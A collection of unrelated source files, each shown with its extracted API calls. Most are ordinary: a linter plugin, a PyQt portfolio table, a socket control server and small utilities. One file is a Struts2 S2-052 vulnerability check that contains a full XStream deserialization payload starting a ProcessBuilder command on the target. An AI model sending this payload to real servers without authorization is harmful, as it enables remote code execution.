dndrsn/SublimeLinter-contrib-cspell | linter.py | ba2335a9282335e52282ee93f3bb2a55f9536984 | from SublimeLinter.lint import Linter, STREAM_STDOUT
class CSpell(Linter):
cmd = 'cspell stdin'
defaults = {'selector': 'source'}
regex = r'^[^:]*:(?P<line>\d+):(?P<col>\d+) - (?P<message>.*)$'
error_stream = STREAM_STDOUT
| [] |
cHemingway/test | metal/gdb/__init__.py | 7fcbd56ad6fe5368b927ea146363bf3d69cd7617 | from metal.gdb.metal_break import Breakpoint, MetalBreakpoint
from metal.gdb.exitcode import ExitBreakpoint
from metal.gdb.timeout import Timeout
from metal.gdb.newlib import NewlibBreakpoints
from metal.gdb.argv import ArgvBreakpoint
| [] |
timeerr/portfolio | portfolio/gui/tabresults/righttable.py | 256032eb638048f3cd3c824f2bb4976a8ec320b1 | #!/usr/bin/python3
from datetime import datetime
from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox
from PyQt5.QtGui import QCursor
from PyQt5.QtCore import Qt, pyqtSignal, QObject
from portfolio.db.fdbhandler import results, strategies, balances
def updatingdata(func):
"""
Decorator to flag self.updatingdata_flag whenever a function
that edits data without user intervention is being run
"""
def wrapper(self, *args, **kwargs):
self.updatingdata_flag = True
func(self, *args, **kwargs)
self.updatingdata_flag = False
return wrapper
class RightTable(QTableWidget):
"""
Table dynamically showing results
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Custom Menu
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(self.showMenu)
# A signal that will be emited whenever a line is removed
self.lineremoved = LineRemoved()
# UI Tweaks
self.verticalHeader().hide()
self.setSortingEnabled(True)
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount")])
# When edited, change the data on the database too
self.cellChanged.connect(self.changeCellOnDatabase)
# A flag to prevent changeCellOnDatabase execution when needed
self.updatingdata_flag = True
# Initialization: show all transactions
self.setData(datetime(1980, 1, 1), datetime.today(), "All", "All")
@updatingdata
def setData(self, startdate, enddate, strategy, account):
"""
Asks the database for results data within certain parameters,
then shows that data on the table
"""
# Clear table
self.clear()
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount"), self.tr("Description")])
# Get desired data from db
results_to_show = results.get_results_from_query(
start_date=startdate, end_date=enddate, strategy=strategy, account=account)
# If the data is empty, we are done
if len(results_to_show) == 0:
self.setRowCount(0)
return
# Resize table
self.setRowCount(len(results_to_show))
self.setColumnCount(len(results_to_show[0]))
# Change content
for rownum, row in enumerate(results_to_show):
for colnum, data in enumerate(row):
item = QTableWidgetItem() # Item that will be inserted
if colnum == 0:
# Ids can't be editable
item.setFlags(Qt.ItemIsSelectable)
elif colnum == 1:
# Change format to display date better
data = datetime.fromtimestamp(data).strftime("%d-%m-%Y")
# Data is now formatted, we can write it on table
item.setData(0, data)
self.setItem(rownum, colnum, item)
def showMenu(self, event):
"""
Custom Menu to show when an item is right-clicked
Options:
- Remove Line: removes line from table and database
"""
menu = QMenu()
# Actions
remove_action = menu.addAction(self.tr("Remove Line"))
# Getting action selected by user
action = menu.exec_(QCursor.pos())
# Act accordingly
if action == remove_action:
self.removeSelection()
self.lineremoved.lineRemoved.emit()
@updatingdata
def removeSelection(self):
"""
Removes the entire row of every selected item,
and then does the same on the databse
"""
# Getting selected indexes, and their corresponding ids
# from the database
selected_indexes_table, selected_ids = [], []
for index in self.selectedIndexes():
index = index.row() # Row number
if index not in selected_indexes_table: # Avoid duplicates
selected_indexes_table.append(index)
selected_ids.append(int(self.item(index, 0).text()))
# Removing the rows from the table and the database
for index, id_db in zip(selected_indexes_table, selected_ids):
results.delete_result(id_db)
self.removeRow(index)
print("Removed rows with ids on db : ", selected_ids,
"\n & ids on table: ", selected_indexes_table)
def changeCellOnDatabase(self, row, column):
"""
When a Table Item is edited by the user,
we want to check if it fits the type
and edit it on the database too
"""
if self.updatingdata_flag is True:
return
# The data is being modified internally (not by the user)
# so no errors assumed
new_item = self.item(row, column)
new_item_data = new_item.text()
database_entry_id = self.item(row, 0).text()
previous_amount = results.getResultAmountById(
database_entry_id) # Useful for balance adjustments later
columnselected_name = self.horizontalHeaderItem(column).text()
# Depending on from which column the item is, we check the data
# proposed differently
# Check which part of the transaction has been edited, and accting accordingly
# -------------- id --------------------
if columnselected_name == self.tr("Id"):
# Ids can't be edited
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(self.tr("Ids can't be edited"))
error_mssg.exec_()
# -------------- Date --------------------
elif columnselected_name == self.tr("Date"):
# The new text has to be a date
try:
new_date = datetime.strptime(new_item_data, "%d-%m-%Y")
results.update_result(
database_entry_id, new_date=new_date.timestamp())
except ValueError:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be a date in format dd-mm-yyyy"))
error_mssg.exec_()
# Reset date to previous one
previous_date_timestamp = results.get_result_date_by_id(
database_entry_id)
previous_date_text = datetime.fromtimestamp(
previous_date_timestamp).strftime("%d-%m-%Y")
self.updatingdata_flag = True
new_item.setData(0, previous_date_text)
self.updatingdata_flag = False
# -------------- Account --------------------
elif columnselected_name == self.tr("Account"):
# The account has to be an existing one
all_accounts = [a[0] for a in balances.get_all_accounts()]
previous_account = results.get_result_account_by_id(
database_entry_id)
if new_item_data not in all_accounts:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The account has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_account)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table on the db
results.update_result(
database_entry_id, new_account=new_item_data)
# Update the balance of the two accounts involved,
# according to the result amount
balances.update_balances_with_new_result(
previous_account, - previous_amount)
balances.update_balances_with_new_result(
new_item_data, previous_amount)
# -------------- Strategy --------------------
elif columnselected_name == self.tr("Strategy"):
# The strategy has to be an existing one
previous_strategy = results.get_result_strategy_by_id(
database_entry_id)
all_strategies = [s[0] for s in strategies.get_all_strategies()]
if new_item_data not in all_strategies:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The strategy has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_strategy)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table of the db
results.updateResult(
database_entry_id, newstrategy=new_item_data)
# Update the pnl of the two strategies involved,
# according to the result amount
strategies.update_strategies_with_new_result(
previous_strategy, - previous_amount)
strategies.update_strategies_with_new_result(
new_item_data, previous_amount)
# -------------- Amount --------------------
elif columnselected_name == self.tr("Amount"):
# The amount has to be an integer
try:
new_item_data = int(new_item_data)
# Change the result on the results table of the db
results.update_result(
database_entry_id, new_amount=new_item_data)
# Update the balances and strategies with the difference
# between the old and the new result
diff_betweeen_results = new_item_data - previous_amount
account_involved = results.get_result_account_by_id(
database_entry_id)
strategy_involved = results.get_result_strategy_by_id(
database_entry_id)
balances.update_balances_with_new_result(
account_involved, diff_betweeen_results)
strategies.update_strategies_with_new_result(
strategy_involved, diff_betweeen_results)
except Exception:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be an integer"))
error_mssg.exec_()
# Reset to previous amount
previous_amount = results.get_result_amount_by_id(
database_entry_id)
self.updatingdata_flag = True
new_item.setData(0, previous_amount)
self.updatingdata_flag = False
# -------------- Description --------------------
elif columnselected_name == self.tr("Description"):
# A description can be any data. So no checks
results.update_result(
database_entry_id, new_description=new_item_data)
class LineRemoved(QObject):
lineRemoved = pyqtSignal()
| [((298, 18, 298, 30), 'PyQt5.QtCore.pyqtSignal', 'pyqtSignal', ({}, {}), '()', False, 'from PyQt5.QtCore import Qt, pyqtSignal, QObject\n'), ((67, 26, 68, 87), 'portfolio.db.fdbhandler.results.get_results_from_query', 'results.get_results_from_query', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((102, 15, 102, 22), 'PyQt5.QtWidgets.QMenu', 'QMenu', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((155, 26, 156, 30), 'portfolio.db.fdbhandler.results.getResultAmountById', 'results.getResultAmountById', ({(156, 12, 156, 29): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((53, 21, 53, 41), 'datetime.datetime', 'datetime', ({(53, 30, 53, 34): '(1980)', (53, 36, 53, 37): '(1)', (53, 39, 53, 40): '(1)'}, {}), '(1980, 1, 1)', False, 'from datetime import datetime\n'), ((53, 43, 53, 59), 'datetime.datetime.today', 'datetime.today', ({}, {}), '()', False, 'from datetime import datetime\n'), ((108, 28, 108, 41), 'PyQt5.QtGui.QCursor.pos', 'QCursor.pos', ({}, {}), '()', False, 'from PyQt5.QtGui import QCursor\n'), ((133, 12, 133, 40), 'portfolio.db.fdbhandler.results.delete_result', 'results.delete_result', ({(133, 34, 133, 39): 'id_db'}, {}), '(id_db)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((165, 25, 165, 38), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((82, 23, 82, 41), 'PyQt5.QtWidgets.QTableWidgetItem', 'QTableWidgetItem', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((174, 27, 174, 71), 'datetime.datetime.strptime', 'datetime.strptime', ({(174, 45, 174, 58): 'new_item_data', (174, 60, 174, 70): '"""%d-%m-%Y"""'}, {}), "(new_item_data, '%d-%m-%Y')", False, 'from datetime import datetime\n'), ((198, 31, 199, 34), 'portfolio.db.fdbhandler.results.get_result_account_by_id', 'results.get_result_account_by_id', ({(199, 16, 199, 33): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((179, 29, 179, 42), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((186, 42, 187, 38), 'portfolio.db.fdbhandler.results.get_result_date_by_id', 'results.get_result_date_by_id', ({(187, 20, 187, 37): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((202, 29, 202, 42), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((216, 16, 217, 65), 'portfolio.db.fdbhandler.results.update_result', 'results.update_result', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((220, 16, 221, 56), 'portfolio.db.fdbhandler.balances.update_balances_with_new_result', 'balances.update_balances_with_new_result', ({(221, 20, 221, 36): 'previous_account', (221, 38, 221, 55): '(-previous_amount)'}, {}), '(previous_account, -previous_amount)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((222, 16, 223, 51), 'portfolio.db.fdbhandler.balances.update_balances_with_new_result', 'balances.update_balances_with_new_result', ({(223, 20, 223, 33): 'new_item_data', (223, 35, 223, 50): 'previous_amount'}, {}), '(new_item_data, previous_amount)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((228, 32, 229, 34), 'portfolio.db.fdbhandler.results.get_result_strategy_by_id', 'results.get_result_strategy_by_id', ({(229, 16, 229, 33): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((197, 42, 197, 69), 'portfolio.db.fdbhandler.balances.get_all_accounts', 'balances.get_all_accounts', ({}, {}), '()', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((233, 29, 233, 42), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((246, 16, 247, 65), 'portfolio.db.fdbhandler.results.updateResult', 'results.updateResult', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((250, 16, 251, 57), 'portfolio.db.fdbhandler.strategies.update_strategies_with_new_result', 'strategies.update_strategies_with_new_result', ({(251, 20, 251, 37): 'previous_strategy', (251, 39, 251, 56): '(-previous_amount)'}, {}), '(previous_strategy, -\n previous_amount)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((252, 16, 253, 51), 'portfolio.db.fdbhandler.strategies.update_strategies_with_new_result', 'strategies.update_strategies_with_new_result', ({(253, 20, 253, 33): 'new_item_data', (253, 35, 253, 50): 'previous_amount'}, {}), '(new_item_data, previous_amount)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((89, 27, 89, 55), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', ({(89, 50, 89, 54): 'data'}, {}), '(data)', False, 'from datetime import datetime\n'), ((188, 37, 189, 44), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', ({(189, 20, 189, 43): 'previous_date_timestamp'}, {}), '(previous_date_timestamp)', False, 'from datetime import datetime\n'), ((230, 44, 230, 75), 'portfolio.db.fdbhandler.strategies.get_all_strategies', 'strategies.get_all_strategies', ({}, {}), '()', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((261, 16, 262, 64), 'portfolio.db.fdbhandler.results.update_result', 'results.update_result', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((266, 35, 267, 38), 'portfolio.db.fdbhandler.results.get_result_account_by_id', 'results.get_result_account_by_id', ({(267, 20, 267, 37): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((268, 36, 269, 38), 'portfolio.db.fdbhandler.results.get_result_strategy_by_id', 'results.get_result_strategy_by_id', ({(269, 20, 269, 37): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((271, 16, 272, 60), 'portfolio.db.fdbhandler.balances.update_balances_with_new_result', 'balances.update_balances_with_new_result', ({(272, 20, 272, 36): 'account_involved', (272, 38, 272, 59): 'diff_betweeen_results'}, {}), '(account_involved,\n diff_betweeen_results)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((273, 16, 274, 61), 'portfolio.db.fdbhandler.strategies.update_strategies_with_new_result', 'strategies.update_strategies_with_new_result', ({(274, 20, 274, 37): 'strategy_involved', (274, 39, 274, 60): 'diff_betweeen_results'}, {}), '(strategy_involved,\n diff_betweeen_results)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((293, 12, 294, 65), 'portfolio.db.fdbhandler.results.update_result', 'results.update_result', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((277, 29, 277, 42), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((284, 34, 285, 38), 'portfolio.db.fdbhandler.results.get_result_amount_by_id', 'results.get_result_amount_by_id', ({(285, 20, 285, 37): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n')] |
d4yvie/advent_of_code_2021 | Day5/overlap_result.py | bb74b9dc7b23c5ba338dcd8d2e698c7ea4e34c59 | class OverlapResult:
def __init__(self, overlap_map: dict[tuple[float, float], int]):
self._overlap_map = overlap_map
self._overlaps = overlap_map_to_overlaps(overlap_map)
@property
def overlaps(self) -> int:
return self._overlaps
@property
def overlap_map(self) -> dict[tuple[float, float], int]:
return self._overlap_map
def overlap_map_to_overlaps(overlap_map: dict[tuple[float, float], int], minimal_overlap=2) -> int:
return len(list(filter(lambda val: val >= minimal_overlap, overlap_map.values())))
| [] |
NikolaiT/proxychecker | setup.py | cd6a024668826c415f91e909c98e4110ffc8c10d | #!/usr/bin/env python
from distutils.core import setup
VERSION = "0.0.1"
setup(
author='Nikolai Tschacher',
name = "proxychecker",
version = VERSION,
description = "A Python proxychecker module that makes use of socks",
url = "http://incolumitas.com",
license = "BSD",
author_email = "[email protected]",
keywords = ["socks", "proxy", "proxychecker"],
py_modules = ['proxychecker', 'sockshandler', 'socks']
)
| [((6, 0, 16, 1), 'distutils.core.setup', 'setup', (), '', False, 'from distutils.core import setup\n')] |
puiterwijk/charlotte | charlotte/charlotte.py | 42aa2a126f473fa4ddedb61eb5dc021d8d609fbe | class Config:
def __init__(self, config_file_name):
self.config_file_name = config_file_name
| [] |
taomujian/linbing | python/app/plugins/http/Struts2/S2_052.py | fe772a58f41e3b046b51a866bdb7e4655abaf51a | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') | [((19, 21, 19, 32), 'app.lib.utils.common.get_capta', 'get_capta', ({}, {}), '()', False, 'from app.lib.utils.common import get_capta, get_useragent\n'), ((22, 26, 22, 41), 'app.lib.utils.common.get_useragent', 'get_useragent', ({}, {}), '()', False, 'from app.lib.utils.common import get_capta, get_useragent\n'), ((94, 24, 94, 97), 'app.lib.utils.request.request.post', 'request.post', (), '', False, 'from app.lib.utils.request import request\n')] |
RIDCorix/UPD | UPD/extension/utils.py | 8694d119181a4afffafbfbab510f697399c1ea13 | import sys
# def get_tools():
# manager = PluginManager()
# manager.setPluginPlaces(["plugins/file_cabinet"])
# manager.collectPlugins()
# return [plugin.plugin_object for plugin in manager.getAllPlugins()]
def get_tools():
import importlib
tools = ['file_cabinet', 'us', 'automator', 'main']
tool_installation_dir1 = 'C:/Users/User/UPD/plugins'
tool_installation_dir2 = '/Users/mac/UPD/plugins'
sys.path.append(tool_installation_dir1)
sys.path.append(tool_installation_dir2)
tool_instances = []
auto_load_modules = ['tasks', 'ui', 'models', 'renderers']
for tool in tools:
tool_instances.append(importlib.import_module('.'.join([tool, 'tool'])).tool)
for module in auto_load_modules:
try:
importlib.import_module('.'.join([tool, module]))
except:
pass
return tool_instances
| [((14, 4, 14, 43), 'sys.path.append', 'sys.path.append', ({(14, 20, 14, 42): 'tool_installation_dir1'}, {}), '(tool_installation_dir1)', False, 'import sys\n'), ((15, 4, 15, 43), 'sys.path.append', 'sys.path.append', ({(15, 20, 15, 42): 'tool_installation_dir2'}, {}), '(tool_installation_dir2)', False, 'import sys\n')] |
cariaso/metapub | sbin/preload_findit_coverage_2.py | bfa361dd6e5de8ee0859e596d490fb478f7dcfba | from __future__ import absolute_import, print_function, unicode_literals
# "preload" for FindIt #2: iterate over same journal list, but actually
# load a PubMedArticle object on each PMID. (no list output created)
from metapub import FindIt, PubMedFetcher
from metapub.findit.dances import the_doi_2step
from config import JOURNAL_ISOABBR_LIST_FILENAME
fetch = PubMedFetcher()
def get_sample_pmids_for_journal(jrnl, years=None, max_pmids=3):
samples = []
if years is None:
pmids = fetch.pmids_for_query(journal=jrnl)
idx = 0
while idx < len(pmids) and idx < max_pmids:
samples.append(pmids[idx])
idx += 1
else:
for year in years:
pmids = fetch.pmids_for_query(journal=jrnl, year=year)
if len(pmids) < 1:
continue
samples.append(pmids[0])
return samples
def main():
jrnls = sorted(open(JOURNAL_ISOABBR_LIST_FILENAME).read().split('\n'))
for jrnl in jrnls:
jrnl = jrnl.strip()
if jrnl == '':
continue
years = ['1975', '1980', '1990', '2002', '2013']
num_desired = len(years)
pmids = get_sample_pmids_for_journal(jrnl, years=years)
if len(pmids) < num_desired:
pmids = pmids + get_sample_pmids_for_journal(jrnl, max_pmids=num_desired-len(pmids))
print('[%s] Sample pmids: %r' % (jrnl, pmids))
for pmid in pmids:
pma = fetch.article_by_pmid(pmid)
print(' ', pma.pmid, pma.title)
if __name__ == '__main__':
main()
| [((12, 8, 12, 23), 'metapub.PubMedFetcher', 'PubMedFetcher', ({}, {}), '()', False, 'from metapub import FindIt, PubMedFetcher\n')] |
vfxetc/sgcache | sgcache/control.py | 670bfac2904373e19c2dac7504d2d7f87018833d | from __future__ import absolute_import
from select import select
import errno
import functools
import itertools
import json
import logging
import os
import socket
import threading
import time
import traceback
log = logging.getLogger(__name__)
from .utils import makedirs, unlink
class TimeOut(Exception):
pass
base_handlers = {
'ping': lambda control, msg: {'type': 'pong', 'pid': os.getpid()}
}
def _coerce_msg(type=None, **msg):
if type:
if isinstance(type, basestring):
msg['type'] = type
return msg
elif msg:
raise ValueError('cannot specify dict message and kwargs')
else:
msg = dict(type)
if 'type' not in msg:
raise ValueError('message requires type')
return msg
class ControlClient(object):
handlers = base_handlers.copy()
def __init__(self, addr=None, sock=None, server=None):
self.addr = addr
self.sock = sock
self.server = server
self._line_buffer = ''
self._message_buffer = []
self._handler_reply_ids = None
self._session_generator = itertools.count(1)
if sock is None:
self.connect()
def connect(self):
# This is indempodent.
if self.sock is not None:
return
if self.addr is None:
return
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.connect(self.addr)
return True
def close(self):
if self.sock:
self.sock.close()
self.sock = None
def _readline(self, timeout=None):
if not self.sock:
return
if timeout:
end_time = time.time() + timeout
buffer_ = self._line_buffer
while True:
r, _, _ = select([self.sock], [], [], max(0, end_time - time.time()) if timeout else None)
if not r:
raise TimeOut()
new = self.sock.recv(4096)
if not new:
self.sock = None
self._line_buffer = ''
return
buffer_ += new
if '\n' in buffer_:
line, buffer_ = buffer_.split('\n', 1)
self._line_buffer = buffer_
return line
def recv(self, timeout=None):
try:
return self._message_buffer.pop(0)
except IndexError:
pass
for attempt_num in (0, 1):
self.connect()
try:
line = self._readline(timeout)
except socket.error as e:
if attempt_num:
raise
if line:
try:
return json.loads(line)
except:
self.send('error', message='malformed message')
self.close()
return
if attempt_num:
return
def recv_for(self, wait_id, timeout=None):
for i in xrange(len(self._message_buffer)):
msg = self._message_buffer[i]
if msg.get('for') == wait_id:
self._message_buffer.pop(i)
return msg
while True:
msg = self.recv(timeout)
if not msg:
return
if msg.get('for') == wait_id:
return msg
self._message_buffer.append(msg)
def send(self, *args, **kwargs):
msg = _coerce_msg(*args, **kwargs)
wait_id = msg.get('wait')
if wait_id is True:
wait_id = msg['wait'] = next(self._session_generator)
encoded = json.dumps(msg)
# Track what has been sent automatically.
if wait_id is not None and self._handler_reply_ids is not None:
self._handler_reply_ids.add(wait_id)
# Attempt to reconnect a couple times when sending this.
for attempt_num in (0, 1):
self.connect()
try:
self.sock.send(encoded + '\n')
except socket.error as e:
if attempt_num:
raise
return wait_id
def reply_to(self, original, *args, **kwargs):
wait_id = original.get('wait')
if wait_id is None:
raise ValueError('original message has no session')
msg = _coerce_msg(*args, **kwargs)
msg['for'] = wait_id
self.send(msg)
def send_and_recv(self, type, **kwargs):
timeout = kwargs.pop('timeout')
msg = _coerce_msg(type, **kwargs)
msg['wait'] = True
wait_id = self.send(msg)
return self.recv_for(wait_id, timeout)
def ping(self, timeout=None):
return self.send_and_recv('ping', pid=os.getpid(), timeout=timeout)
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
msg = self.recv()
if not msg:
return
type_ = msg.get('type')
wait_id = msg.get('wait')
func = self.handlers.get(type_)
if func is None and self.server:
func = self.server.handlers.get(type_)
if func is None:
log.warning('unknown message type %r' % type_)
self.reply_to(msg, 'error', message='unknown message type %r' % type_)
continue
if self.server and self.server.name:
log.info('%s handling %s' % (self.server.name, type_))
else:
log.info('handling %s' % type_)
self._handler_reply_ids = set()
try:
res = func(self, msg)
except Exception as e:
self.reply_to(msg, 'error', message='unhandled exception %s' % e)
continue
# If the handler replied, then we are done.
if res is None and wait_id is None or wait_id in self._handler_reply_ids:
continue
res = res.copy() if isinstance(res, dict) and 'type' in res else {'type': 'result', 'value': res}
if wait_id is not None:
res['for'] = wait_id
self.send(res)
class ControlServer(object):
def __init__(self, addr, name=None):
self.addr = addr
self.name = name
self.handlers = base_handlers.copy()
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
if os.path.exists(self.addr):
# TODO: Try connecting to it before destroying it.
unlink(self.addr)
makedirs(os.path.dirname(self.addr))
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.bind(self.addr)
self.sock.listen(5)
def register(self, func=None, **kwargs):
if func is None:
return functools(self.register(**kwargs))
self.handlers[kwargs.get('name') or func.__name__] = func
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
try:
client_sock, addr = self.sock.accept()
except socket.timeout:
continue
client = ControlClient(sock=client_sock, server=self)
client.loop(async=True)
| [] |
mtsolmn/lantz-drivers | lantz/drivers/tektronix/tds1002b.py | f48caf9000ddd08f2abb837d832e341410af4788 | # -*- coding: utf-8 -*-
"""
lantz.drivers.tektronix.tds1012
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements the drivers to control an oscilloscope.
:copyright: 2015 by Lantz Authors, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from lantz.core import Feat, MessageBasedDriver
class TDS1002b(MessageBasedDriver):
MANUFACTURER_ID = '0x699'
MODEL_CODE = '0x363'
@Feat(read_once=True)
def idn(self):
return self.query('*IDN?')
| [((19, 5, 19, 25), 'lantz.core.Feat', 'Feat', (), '', False, 'from lantz.core import Feat, MessageBasedDriver\n')] |
linkmauve/apitrace | specs/dxgi.py | a22dda1ac2f27cd014ac7a16e7b7b6ebc9f14ae1 | ##########################################################################
#
# Copyright 2014 VMware, Inc
# Copyright 2011 Jose Fonseca
# All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
##########################################################################/
from .winapi import *
DXGI_FORMAT = Enum("DXGI_FORMAT", [
